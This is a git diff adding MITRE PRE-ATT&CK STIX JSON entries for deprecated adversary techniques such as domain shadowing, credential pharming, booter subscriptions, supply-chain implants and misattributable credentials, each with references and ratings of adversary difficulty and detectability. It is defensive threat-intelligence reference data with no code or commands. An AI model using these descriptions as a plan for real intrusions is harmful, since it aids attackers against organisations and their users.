@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--a4a6c0d3-16bf-49d0-8e70-07cff5d5d0fd", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--3160347f-11ac-44a3-9640-a648b3c17a8f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Private whois services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1305).\n\nEvery domain registrar maintains a publicly viewable database that displays contact information for every registered domain. Private 'whois' services display alternative information, such as their own company data, rather than the owner of the domain. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1305", + "external_id": "T1305" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Algorithmically possible to detect COTS service usage or use of non-specific mailing addresses (PO Boxes, drop sites, etc.)", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Commercially available or easy to set up and/or register using a disposable email account.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1082", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--31a57c70-6709-4d06-a473-c3df1f74c1d4.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--31a57c70-6709-4d06-a473-c3df1f74c1d4.json new file mode 100644 index 0000000000000000000000000000000000000000..ad8cb940de4349a9815bbc19589f143f2509e1da --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--31a57c70-6709-4d06-a473-c3df1f74c1d4.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--01768190-ce05-4ceb-9826-694d85161a4e", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--31a57c70-6709-4d06-a473-c3df1f74c1d4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess security posture of physical locations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1302).\n\nPhysical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1302", + "external_id": "T1302" + }, + { + "source_name": "CyberPhysicalAssessment", + "description": "Doug MacDonald, Samuel L Clements, Scott W Patrick, Casey Perkins, George Muller, Mary J Lancaster, Will Hutton. (2013, February). Cyber/physical security vulnerability assessment integration. Retrieved March 6, 2017." + }, + { + "source_name": "CriticalInfrastructureAssessment", + "description": "J. Depoy, J. Phelan, P. Sholander, B. Smith, G.B. Varnado and G. Wyss. (2015). RISK ASSESSMENT for PHYSICAL AND CYBER ATTACKS on CRITICAL INFRASTRUCTURES. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Physical security is often unaware of implications of physical access to network. 
However, some organizations have thorough physical security measures that would log and report attempted incursions, perimeter breaches, unusual RF at a site, etc.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Social engineering and OSINT are still generally successful. Physical locations of offices/sites are easily determined. Monitoring for other sites of interest, such as backup storage vendors, is also easy to accomplish.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1079", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--31fa5b03-1ede-4fab-8a68-ed831fcf4899.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--31fa5b03-1ede-4fab-8a68-ed831fcf4899.json new file mode 100644 index 0000000000000000000000000000000000000000..09c9a3010b2cf41d2b95ec7cf157d6725e5c0e30 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--31fa5b03-1ede-4fab-8a68-ed831fcf4899.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--eae4beb9-4e3b-466e-9013-48a824b0e6c3", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--31fa5b03-1ede-4fab-8a68-ed831fcf4899", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Misattributable credentials", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1322).\n\nThe use of credentials by an adversary with the intent to hide their true identity and/or portray them self as another person or entity. An adversary may use misattributable credentials in an attack to convince a victim that credentials are legitimate and trustworthy when this is not actually the case. (Citation: FakeSSLCerts)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1322", + "external_id": "T1322" + }, + { + "source_name": "FakeSSLCerts", + "description": "Paul Mutton. (2014, February 12). Fake SSL certificates deployed across the internet. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "If a previous incident identified the credentials used by an adversary, defenders can potentially use these credentials to track the adversary through reuse of the same credentials.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can easily create and use misattributable credentials to obtain servers, build environment, [https://aws.amazon.com AWS] accounts, etc. 
Many service providers require some form of identifiable information such as a phone number or email address, but there are several avenues to acquire these consistent with the misattributable identity.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1099", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--34450117-d1d5-417c-bb74-4359fc6551ca.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--34450117-d1d5-417c-bb74-4359fc6551ca.json new file mode 100644 index 0000000000000000000000000000000000000000..3046a7e89ca6c6e257f200200f4a0bc75e4a09ad --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--34450117-d1d5-417c-bb74-4359fc6551ca.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--99f15f2c-8633-4757-811f-b1fa45f55c21", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--34450117-d1d5-417c-bb74-4359fc6551ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze presence of outsourced capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1303).\n\nOutsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. (Citation: Scasny2015) (Citation: OPM Breach)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1303", + "external_id": "T1303" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + }, + { + "source_name": "OPM Breach", + "description": "Hon. Jason Chaffetz, Hon. Mark Meadows, Hon. Will Hurd. (2016, September 7). The OPM Data Breach: How the Government Jeopardized Our National Security for More than a Generation. Retrieved March 28, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Much of this analysis can be done using the target's open source website, which is purposely designed to be informational and may not have extensive visitor tracking capabilities.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Analyzing business relationships from information gathering may provide insight into outsourced capabilities. In certain industries, outsourced capabilities or close business partnerships may be advertised on corporate websites.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1080", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--357e137c-7589-4af1-895c-3fbad35ea4d2.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--357e137c-7589-4af1-895c-3fbad35ea4d2.json new file mode 100644 index 0000000000000000000000000000000000000000..a42b58e613fb06ba78d072083b910564aac076de --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--357e137c-7589-4af1-895c-3fbad35ea4d2.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--2d9c1fd5-ea97-40fe-ac69-cf58ca0d105e", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--357e137c-7589-4af1-895c-3fbad35ea4d2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate or encrypt code", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1319).\n\nObfuscation is the act of creating code that is more difficult to understand. Encoding transforms the code using a publicly available format. Encryption transforms the code such that it requires a key to reverse the encryption. (Citation: CylanceOpCleaver)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1319", + "external_id": "T1319" + }, + { + "source_name": "CylanceOpCleaver", + "description": "CYLANCE. (n.d.). Operation Cleaver. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Detecting encryption is easy, decrypting/deobfuscating is hard.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Various solutions exist for the adversary to use. 
This technique is commonly used to prevent attribution and evade detection.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1096", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--388f3a5c-2cdd-466c-9159-b507fa429fcd.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--388f3a5c-2cdd-466c-9159-b507fa429fcd.json new file mode 100644 index 0000000000000000000000000000000000000000..e78e8547e1c685ad1c101a25bbc3d6e9e18b38b3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--388f3a5c-2cdd-466c-9159-b507fa429fcd.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--f9d872e0-af4c-4f2f-838a-43fb08510188", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--388f3a5c-2cdd-466c-9159-b507fa429fcd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Hardware or software supply chain implant", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1365).\n\nDuring production and distribution, the placement of software, firmware, or a CPU chip in a computer, handheld, or other electronic device that enables an adversary to gain illegal entrance. (Citation: McDRecall) (Citation: SeagateMaxtor)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1365", + "external_id": "T1365" + }, + { + "source_name": "McDRecall", + "description": "Tash Shifrin. (2006, October 16). Malware forces McDonald\u2019s recall of giveaway MP3s. Retrieved March 9, 2017." + }, + { + "source_name": "SeagateMaxtor", + "description": "Brandon Hill. (2007, November 14). Seagate Serves External HDDs with a Side of Virus. Retrieved March 9, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The number of elements and components in a supply chain of HW or SW is vast and detecting an implant is complex for SW, but more complex for HW.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Access to the supply chain by an adversary can be a challenging endeavor, depending on what element is attempting to be subverted.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1142", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--38a6d2f5-d948-4235-bb91-bb01604448b4.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--38a6d2f5-d948-4235-bb91-bb01604448b4.json new file mode 100644 index 0000000000000000000000000000000000000000..5b3c43a1f4545f13bbdad61502dfca3396b01de3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--38a6d2f5-d948-4235-bb91-bb01604448b4.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--19d4578e-9553-40f4-b7d7-cb5dd3c06d08", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--38a6d2f5-d948-4235-bb91-bb01604448b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Credential pharming", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nCredential pharming a form of attack designed to steal users' credential by redirecting users to fraudulent websites. Pharming can be conducted either by changing the hosts file on a victim's computer or by exploitation of a vulnerability in DNS server software. (Citation: DriveByPharming) (Citation: GoogleDrive Phishing)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1374", + "url": "https://attack.mitre.org/techniques/T1374" + }, + { + "description": "Ellen Messmer. (2008, January 22). First case of \"drive-by pharming\" identified in the wild. Retrieved March 2, 2017.", + "source_name": "DriveByPharming" + }, + { + "description": "Nick Johnston. (2014, March 13). Google Docs Users Targeted by Sophisticated Phishing Scam. 
Retrieved March 29, 2017.", + "source_name": "GoogleDrive Phishing" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:18:16.035Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1151", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Although it can be difficult to spoof/redirect content to a hostile service via DNS poisoning or MiTM attacks, current malware such as Zeus is able to successfully pharm credentials and end users are not well-versed in checking for certificate mismatches.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Fidelity of networking monitoring must be able to detect when traffic is diverted to non-normal sources at a site level. It is possible to identify some methods of pharming, but detection capabilities are limited and not commonly implemented.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3d1488a6-59e6-455a-8b80-78b53edc33fe.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3d1488a6-59e6-455a-8b80-78b53edc33fe.json new file mode 100644 index 0000000000000000000000000000000000000000..6e97d42e418b831aff54af00dc3e262d15e532be --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3d1488a6-59e6-455a-8b80-78b53edc33fe.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--0f147bb6-4652-4f1c-b0b9-e909147272d7", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--3d1488a6-59e6-455a-8b80-78b53edc33fe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain booter/stressor subscription", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1396).\n\nConfigure and setup booter/stressor services, often intended for server stress testing, to enable denial of service attacks. (Citation: Krebs-Anna) (Citation: Krebs-Booter) (Citation: Krebs-Bazaar)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1396", + "external_id": "T1396" + }, + { + "source_name": "Krebs-Anna", + "description": "Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai Worm Author?. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/" + }, + { + "source_name": "Krebs-Booter", + "description": "Brian Krebs. (2016, October 27). Are the Days of \u201cBooter\u201d Services Numbered?. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/" + }, + { + "source_name": "Krebs-Bazaar", + "description": "Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service Bazaar. 
Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1173", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Easily accessible and used to launch DDoS attacks by even novice Internet users, and can be purchased from providers for a nominal fee, some of which even accept credit cards and PayPal payments to do.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Purchase of booster services is not observable; potentially can trace booster service used to origin of sale, yet not before attack is executed. Furthermore, subscription does not automatically mean foul intention.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3f157dee-74f0-41fc-801e-f837b8985b0a.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3f157dee-74f0-41fc-801e-f837b8985b0a.json new file mode 100644 index 0000000000000000000000000000000000000000..5d0147314d985baa10162a2e1c8f5e893fe3cdda --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3f157dee-74f0-41fc-801e-f837b8985b0a.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--8b2fff14-9376-4a8e-91f2-1449e3a1ab47", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--3f157dee-74f0-41fc-801e-f837b8985b0a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Shadow DNS", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1340).\n\nThe process of gathering domain account credentials in order to silently create subdomains pointed at malicious servers without tipping off the actual owner. (Citation: CiscoAngler) (Citation: ProofpointDomainShadowing)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1340", + "external_id": "T1340" + }, + { + "source_name": "CiscoAngler", + "description": "Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.", + "url": "https://blogs.cisco.com/security/talos/angler-domain-shadowing" + }, + { + "source_name": "ProofpointDomainShadowing", + "description": "Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved March 6, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1117", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "To successfully conduct this attack, an adversary usually phishes the individual behind the domain registrant account, logs in with credentials, and creates a large amount of subdomains.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Detection of this technique requires individuals to monitor their domain registrant accounts routinely. In addition, defenders have had success with blacklisting sites or IP addresses, but an adversary can defeat this by rotating either the subdomains or the IP addresses associated with the campaign.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--41086474-e6de-4fac-bb69-640db7fdf3d2.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--41086474-e6de-4fac-bb69-640db7fdf3d2.json new file mode 100644 index 0000000000000000000000000000000000000000..3dac7e936269af67a901b798953113995a794f03 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--41086474-e6de-4fac-bb69-640db7fdf3d2.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--da15c19f-e841-442a-acf3-ed40d68dac2e", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--41086474-e6de-4fac-bb69-640db7fdf3d2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Runtime code download and execution", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nMany mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). These app stores scan submitted applications for malicious behavior. However, applications can evade these scans by downloading and executing new code at runtime that was not included in the original application package. (Citation: Fruit vs Zombies) (Citation: Android Hax) (Citation: Execute This!) (Citation: HT Fake News App) (Citation: Anywhere Computing kill 2FA) (Citation: Android Security Review 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1395", + "url": "https://attack.mitre.org/techniques/T1395" + }, + { + "description": "Claud Xiao. (2016). Fruit vs Zombies: Defeat Non-jailbroken iOS Malware. Retrieved April 12, 2017.", + "source_name": "Fruit vs Zombies" + }, + { + "description": "Jon Oberheide. (2010). Android Hax. Retrieved April 12, 2017.", + "source_name": "Android Hax" + }, + { + "description": "Sebastian Poeplau, Yanick Fratantonio, Antonio Bianchi, Christopher Kruegel, Giovanni Vigna. (2014). Execute This! Analyzing Unsafe and Malicious Dynamic Code Loading in Android Applications. Retrieved April 12, 2017.", + "source_name": "Execute This!" + }, + { + "description": "Wish Wu. (2016, July 15). Fake News App in Hacking Team Dump Designed to Bypass Google Play. 
Retrieved April 12, 2017.", + "source_name": "HT Fake News App" + }, + { + "description": "Radhesh Krishnan Konoth, Victor van der Veen and Herbert Bos. (2016). How Anywhere Computing Just Killed Your Phone-Based Two-Factor Authentication. Retrieved April 12, 2017.", + "source_name": "Anywhere Computing kill 2FA" + }, + { + "description": "Google. (2016, April). Android Security 2015 Year In Review. Retrieved April 12, 2017.", + "source_name": "Android Security Review 2015" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:24:50.384Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1172", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Runtime code execution techniques and examples of their use are widely documented on both Apple iOS and Android.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Third-party mobile application security analysis services exist that scan for use of these techniques in iOS and Android applications. Additionally, Google specifically calls out the ability to \"identify attacks that require connection to a server and dynamic downloading of code\" in its Android Security 2015 Year in Review report. However, many applications use these techniques as part of their legitimate operation, increasing the difficulty of detecting or preventing malicious use.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--45242287-2964-4a3e-9373-159fad4d8195.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--45242287-2964-4a3e-9373-159fad4d8195.json new file mode 100644 index 0000000000000000000000000000000000000000..0d938a0a10d0635230bb8b2b1dc37586e2f22667 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--45242287-2964-4a3e-9373-159fad4d8195.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--2d1543eb-8a7f-423e-abfc-63c5c3ff92fe", + "spec_version": "2.0", + "objects": [ + { + "created": "2017-12-14T16:46:06.044Z", + "modified": "2020-10-26T13:42:49.342Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "type": "attack-pattern", + "x_mitre_old_attack_id": "PRE-T1105", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Proliferation of DNS TLDs and registrars. Adversary may choose domains that are similar to legitimate domains (aka \"domain typosquatting\" or homoglyphs).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "This is by design captured in public registration logs. Various tools and services exist to track/query/monitor domain name registration information.", + "x_mitre_detectable_by_common_defenses": "Yes", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1328", + "external_id": "T1328" + }, + { + "source_name": "PWCSofacy2014", + "description": "Tom Lancaster and Michael Yip. (2014, December 05). APT28: Sofacy? So-funny.. Retrieved March 6, 2017." + } + ], + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1328).\n\nDomain Names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. 
(Citation: PWCSofacy2014)", + "name": "Buy domain name", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--45242287-2964-4a3e-9373-159fad4d8195", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--46017368-6e09-412b-a29c-385be201cc03.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--46017368-6e09-412b-a29c-385be201cc03.json new file mode 100644 index 0000000000000000000000000000000000000000..f3653f4316dd3dd2ac842766bd5799852ea6698d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--46017368-6e09-412b-a29c-385be201cc03.json 
